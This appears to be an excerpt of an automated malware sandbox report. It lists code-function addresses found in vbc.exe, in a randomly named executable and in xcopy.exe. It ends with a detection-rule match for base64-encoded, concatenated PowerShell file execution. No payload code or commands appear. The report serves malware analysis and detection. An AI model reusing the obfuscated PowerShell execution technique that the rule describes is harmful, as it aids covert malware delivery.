Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053752A0	13_2_053752A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_054112ED	13_2_054112ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538B2C0	13_2_0538B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05421D5A	13_2_05421D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05427D73	13_2_05427D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537AD00	13_2_0537AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05373D40	13_2_05373D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05388DBF	13_2_05388DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536ADE0	13_2_0536ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538FDC0	13_2_0538FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E9C32	13_2_053E9C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370C00	13_2_05370C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542FCF2	13_2_0542FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05360CF2	13_2_05360CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05410CB5	13_2_05410CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05390F30	13_2_05390F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053B2F28	13_2_053B2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542FF09	13_2_0542FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E4F40	13_2_053E4F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05371F92	13_2_05371F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537CFE0	13_2_0537CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542FFB1	13_2_0542FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05362FC8	13_2_05362FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542EE26	13_2_0542EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05370E59	13_2_05370E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05379EB0	13_2_05379EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542EEDB	13_2_0542EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05382E90	13_2_05382E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542CE93	13_2_0542CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05386962	13_2_05386962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05379950	13_2_05379950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538B950	13_2_0538B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053729A0	13_2_053729A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0543A9A6	13_2_0543A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053DD800	13_2_053DD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05372840	13_2_05372840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0537A840	13_2_0537A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053568B8	13_2_053568B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0539E8F0	13_2_0539E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053738E0	13_2_053738E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542AB40	13_2_0542AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542FB76	13_2_0542FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05426BD7	13_2_05426BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0538FB80	13_2_0538FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053ADBF9	13_2_053ADBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E5BF0	13_2_053E5BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_05427A46	13_2_05427A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0542FA49	13_2_0542FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053E3A6C	13_2_053E3A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0541DAC6	13_2_0541DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_053B5AA0	13_2_053B5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0536EA80	13_2_0536EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 13_2_0540DAAC	13_2_0540DAAC
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F47C1E	17_2_04F47C1E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3F5BE	17_2_04F3F5BE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3D5AE	17_2_04F3D5AE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3D6F2	17_2_04F3D6F2
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3D6FE	17_2_04F3D6FE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F45E1E	17_2_04F45E1E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F45E1A	17_2_04F45E1A
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F33935	17_2_04F33935
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F5E3FE	17_2_04F5E3FE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3F39A	17_2_04F3F39A
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_04F3F39E	17_2_04F3F39E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088F228E	17_2_088F228E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088DBAAE	17_2_088DBAAE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D322E	17_2_088D322E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D322A	17_2_088D322A
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D83DE	17_2_088D83DE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D9CAE	17_2_088D9CAE
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D9CAA	17_2_088D9CAA
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D143E	17_2_088D143E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D344E	17_2_088D344E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D158E	17_2_088D158E
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088D1582	17_2_088D1582
Source: C:\Program Files (x86)\IMBADnIrYEVxeURBJUkRqQsVcbBRgVGEevzNpQkJG\RNDzmzHPyfZMe3si.exe	Code function: 17_2_088C77C5	17_2_088C77C5
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0375D34C	18_2_0375D34C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038303E6	18_2_038303E6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0377E3F0	18_2_0377E3F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382132D	18_2_0382132D
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382A352	18_2_0382A352
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037B739A	18_2_037B739A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038112ED	18_2_038112ED
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0378B2C0	18_2_0378B2C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037752A0	18_2_037752A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03810274	18_2_03810274
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0375F172	18_2_0375F172
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037A516C	18_2_037A516C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038301AA	18_2_038301AA
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038281CC	18_2_038281CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03760100	18_2_03760100
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0380A118	18_2_0380A118
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0377B1B0	18_2_0377B1B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0383B16B	18_2_0383B16B
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0381F0CC	18_2_0381F0CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382F0E0	18_2_0382F0E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038270E9	18_2_038270E9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037770C0	18_2_037770C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03770770	18_2_03770770
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03794750	18_2_03794750
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382F7B0	18_2_0382F7B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0376C7C0	18_2_0376C7C0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_038216CC	18_2_038216CC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0378C6E0	18_2_0378C6E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03830591	18_2_03830591
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0380D5B0	18_2_0380D5B0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03770535	18_2_03770535
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03827571	18_2_03827571
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03761460	18_2_03761460
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0381E4F6	18_2_0381E4F6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382F43F	18_2_0382F43F
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03822446	18_2_03822446
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03826BD7	18_2_03826BD7
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037ADBF9	18_2_037ADBF9
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382AB40	18_2_0382AB40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382FB76	18_2_0382FB76
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0378FB80	18_2_0378FB80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037E3A6C	18_2_037E3A6C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0380DAAC	18_2_0380DAAC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0381DAC6	18_2_0381DAC6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03827A46	18_2_03827A46
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382FA49	18_2_0382FA49
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037B5AA0	18_2_037B5AA0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0376EA80	18_2_0376EA80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03786962	18_2_03786962
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0383A9A6	18_2_0383A9A6
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03779950	18_2_03779950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0378B950	18_2_0378B950
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037729A0	18_2_037729A0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03772840	18_2_03772840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0377A840	18_2_0377A840
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037DD800	18_2_037DD800
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0379E8F0	18_2_0379E8F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037738E0	18_2_037738E0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037568B8	18_2_037568B8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382FFB1	18_2_0382FFB1
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037E4F40	18_2_037E4F40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03790F30	18_2_03790F30
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037B2F28	18_2_037B2F28
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382FF09	18_2_0382FF09
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0377CFE0	18_2_0377CFE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03762FC8	18_2_03762FC8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03771F92	18_2_03771F92
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382CE93	18_2_0382CE93
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03770E59	18_2_03770E59
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382EEDB	18_2_0382EEDB
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382EE26	18_2_0382EE26
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03779EB0	18_2_03779EB0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03782E90	18_2_03782E90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03773D40	18_2_03773D40
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0377AD00	18_2_0377AD00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0376ADE0	18_2_0376ADE0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0378FDC0	18_2_0378FDC0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03788DBF	18_2_03788DBF
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03821D5A	18_2_03821D5A
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03827D73	18_2_03827D73
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03810CB5	18_2_03810CB5
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_037E9C32	18_2_037E9C32
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0382FCF2	18_2_0382FCF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03770C00	18_2_03770C00
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_03760CF2	18_2_03760CF2
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D61F20	18_2_02D61F20
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D51307	18_2_02D51307
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5B0D0	18_2_02D5B0D0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5B0C4	18_2_02D5B0C4
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D637F0	18_2_02D637F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D637EC	18_2_02D637EC
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D655F0	18_2_02D655F0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5CF90	18_2_02D5CF90
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5AF80	18_2_02D5AF80
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D7BDD0	18_2_02D7BDD0
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5CD70	18_2_02D5CD70
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_02D5CD6C	18_2_02D5CD6C
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0357E353	18_2_0357E353
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0357E235	18_2_0357E235
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0357D7B8	18_2_0357D7B8
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: 18_2_0357E6EC	18_2_0357E6EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E0535	21_2_051E0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E0770	21_2_051E0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05204750	21_2_05204750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051DC7C0	21_2_051DC7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FC6E0	21_2_051FC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051D0100	21_2_051D0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05226000	21_2_05226000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_052602C0	21_2_052602C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051EAD00	21_2_051EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051F8DBF	21_2_051F8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E8DC0	21_2_051E8DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051EEDEC	21_2_051EEDEC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051DADE0	21_2_051DADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E0C00	21_2_051E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051D0CF2	21_2_051D0CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05222F28	21_2_05222F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05200F30	21_2_05200F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05254F40	21_2_05254F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_0525EFA0	21_2_0525EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051D2FC8	21_2_051D2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E0E59	21_2_051E0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051F2E90	21_2_051F2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051F6962	21_2_051F6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E29A0	21_2_051E29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E2840	21_2_051E2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051EA840	21_2_051EA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051C68B8	21_2_051C68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05218890	21_2_05218890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_0520E8F0	21_2_0520E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051DEA80	21_2_051DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051D1460	21_2_051D1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E3497	21_2_051E3497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_052274E0	21_2_052274E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051EB730	21_2_051EB730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_0521516C	21_2_0521516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051CF172	21_2_051CF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051EB1B0	21_2_051EB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051CD34C	21_2_051CD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E33F3	21_2_051E33F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E52A0	21_2_051E52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FB2C0	21_2_051FB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FD2F0	21_2_051FD2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E3D40	21_2_051E3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FFDC0	21_2_051FFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05259C32	21_2_05259C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051F9C20	21_2_051F9C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E1F92	21_2_051E1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E9EB0	21_2_051E9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E9950	21_2_051E9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FB950	21_2_051FB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E5990	21_2_051E5990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_0524D800	21_2_0524D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051E38E0	21_2_051E38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_051FFB80	21_2_051FFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05255BF0	21_2_05255BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_0521DBF9	21_2_0521DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 21_2_05253A6C	21_2_05253A6C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 0535B970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 053A5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 053DEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 0524EA12 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 05227E54 appears 97 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 053EF290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: String function: 053B7E54 appears 96 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 0375B970 appears 268 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 037DEA12 appears 86 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 037A5130 appears 36 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 037B7E54 appears 89 times
Source: C:\Windows\SysWOW64\xcopy.exe	Code function: String function: 037EF290 appears 105 times

Source: Process Memory Space: powershell.exe PID: 3180, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
